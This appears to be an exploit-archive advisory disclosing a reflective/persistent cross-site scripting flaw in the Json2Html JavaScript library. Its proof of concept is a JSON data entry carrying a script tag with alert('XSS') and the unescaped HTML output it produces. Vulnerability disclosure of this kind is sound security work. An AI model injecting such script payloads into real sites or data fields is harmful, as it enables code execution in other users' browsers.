Json2Html Cross Site Scripting

Posted on 16 June 2016

# Exploit Title: Json2Html Javascript Library - Reflective/Persistant XSS
# Date: 0 day
# Exploit Author: David Silveiro
# Exploit Author Github: github.com/davidsilveiro
# Vendor Homepage: http://json2html.com/
# Software Link: https://github.com/moappi/json2html/archive/master.zip
# Platorm: Javascript

Json2Html is a pure javascript library that transforms json to html and is
used as a Jquery plugin, as well as a Node.js package.

The issue lyes with there being no sanitization when the conversion between
the two occures. For example;

Proof of concept:

var transform = {'<>':'li','html':'${name} (${age})'};

var data = [
{'name':'Bob','age':40},
{'name':'<script>alert('XSS')</script>','age':34}
];

and then transformed...

<html>

<li>
Bob (40)
</li>

<li>
<script>alert('XSS')</script> (34)
</li>

</html>

TOP

Malware :

None in database

Last 20

Exploits :

Customer Support System 1.0 Cross Site Scripting
Xhibiter NFT Marketplace 1.10.2 SQL Injection
WordPress WPCode Lite 2.1.14 Cross Site Scripting
Azon Dominator Affiliate Marketing Script SQL Injection
Simple Laboratory Management System 1.0 SQL Injection

Last 20